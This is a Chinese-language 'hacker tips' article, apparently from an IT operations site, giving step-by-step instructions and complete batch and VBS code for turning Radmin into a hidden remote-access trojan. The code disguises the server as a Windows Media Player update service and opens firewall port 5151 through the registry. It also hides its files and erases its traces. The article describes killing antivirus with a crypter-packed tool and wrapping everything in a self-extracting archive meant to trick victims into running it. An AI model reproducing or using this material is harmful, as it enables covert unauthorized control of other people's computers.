黑客技巧打造完美远程控制软件Radmin_中国IT运维网www.cnitom.com

大家好，关于如何打造出完美的Radmin服务端，网上有很多类似的修改后的程序，但有的服务名会暴露，有的会显示CMD窗口，我弥补了它们的缺点，综合了它们的优点，打造出了现在这个完美的Radmin服务端。

准备工具

Rock免杀工具；

IcoSprite图标更改器；

Killer15杀杀毒软件防火墙工具；

SC.exe服务添加删除更改工具；

AdmDll.dll、Raddrv.dll、R_server（这个不用说了吧，Radmin的服务端）。

程序特点

自解压形式，双击即可，自动解压到%systemroot%\system32\drivers\目录下，并能干掉卡巴斯基等杀毒软件。使用vbs嵌套bat来执行所有内容，不会跳出任何窗口。自建服务，并修改服务名、显示名、描述使其做到隐蔽。依存Windows Update服务，给试图关闭它带来困惑。做完一切后以只读，隐藏形式隐蔽Radmin服务端的三个程序，删除掉生成的一些REG、BAT、VBS文件，并能够突破Radmin外部连接进来时XP SP2防火墙的拦截。

制作过程

首先自己安装一下Radmin服务端，配置完密码，端口等信息后导出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件，这里我另存为名Server.reg。然后要修改R_server.exe的图标并修改文件名为迷惑性文字如Update.exe，修改图标我用IcoSprite，觉得还不错。这样假如对方装有天网之类防火墙的话，可以骗过一些菜鸟，同意允许对外连接。

接下来我们制作核心部分，最关键的BAT，重要的我将简单解释：

@echo off 
@sc stop r_server 
‘假如已经被装过R_server服务，先用SC将它停掉。 
@sc delete r_server 
‘将已经装过R_server服务删除。 
@regedit /s server.reg 
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= 
own type= interact start= auto DisplayName= "Media Player of Remote Control Driver 
Update" 
‘这句是用SC建立一个服务，服务名为Mpservice，路径Binpath为"%systemroot%\system32
\drivers\Update.exe /service"，类型type为 own 与interact交互，启动类型start为自动，
显示名DisplayName为"Media Player of Remote Control Driver Update"。 
@sc description MPservice "为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。" 
‘这句是将MPservice服务的描述改为“为Windows Media Player提供加载进程及驱动程序、
库提供基层更新安全补丁的服务。” 
@sc config wuauserv depend= MPservice 
‘配置MPservice使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的
wuauserv是系统在Windows Update 
网站的自动更新服务）。这里的目的是迷惑管理员，使其不敢轻易停止我们生成的Radmin服务。 
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32
\drivers\DisFirewall.reg 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\
StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg 
‘这里添加成的一个DisFirewall.reg注册表文件，在对方是XP SP2系统的情况下
将起到很大重要，由于SP2自带的防火墙配置信息是存
放于注册表中的，所有完全可以通过写入自己想要的信息使你的R_server可以接受
外界的连接。 
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32
\drivers\DisFirewall.reg 
‘这句是允许外部连接5151的TCP端口，设置防火墙此规则名为Windows Update Services。 
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg 
@attrib +h +r %systemroot%\system32\drivers\Update.exe 
@attrib +h +r %systemroot%\system32\drivers\admdll.dll 
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll 
‘以上三句是设置服务端三个文件为隐藏、只读属性。 
@sc start MPservice 
@del /q /f /s %systemroot%\system32\drivers\server.reg 
@del /q /f /s %systemroot%\system32\drivers\Update.vbs 
@del /q /f /s %systemroot%\system32\drivers\Update.bat 
@del /q /f /s %systemroot%\system32\drivers\sc.exe 
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg 
‘以上是清理生成出来的杂物，加参数/q是以安静模式删除，不要求确认，
参数/f是强制删除只读文件，参数/s是从所有子目录删除指定文件。

接下来制作一个vbs文件，作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。里面写上如下代码：

On Error Resume Next 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("Update.bat"，0)

最后出场的是Killer15.exe这个东东，按它的说明书说是可以杀Norton AntiVirus、McAfee、个人计算机Cillin&KAV等。我用我的卡巴2006测试过，确实能被它杀掉。由于直接运行的话还没执行就被杀毒软件给干掉了，所以给它加个壳，这里用Rock免杀工具，经过它加的壳后逃过了我卡巴的大关，格式是：

usage: rock [filename]

好了，整理一下：三个服务端文件+一个注册表信息，一个BAT，一个VBS，一个SC，一个Killer15，一共是8个文件，将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”，到高级里打开“自解压选项”，“解压路径”为%systemroot%\system32\drivers\，解压后运行“Update.vbs”，解压前运行“Killer15.new.exe”，模式里选“全部隐藏”跟“跳过已经存在文件”，文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的ico图标做为自解压最后生成的图标。OK，一个自解压形式的Radmin服务端就这样生成了。假如你是*欺骗别人双击执行的，你还可以自己添加个小游戏之类的进去，令它双击自解压的同时不会什么反映都没有，这里我就不再阐述了。

黑客技巧 打造完美远程控制软件Radmin

黑客技巧打造完美远程控制软件Radmin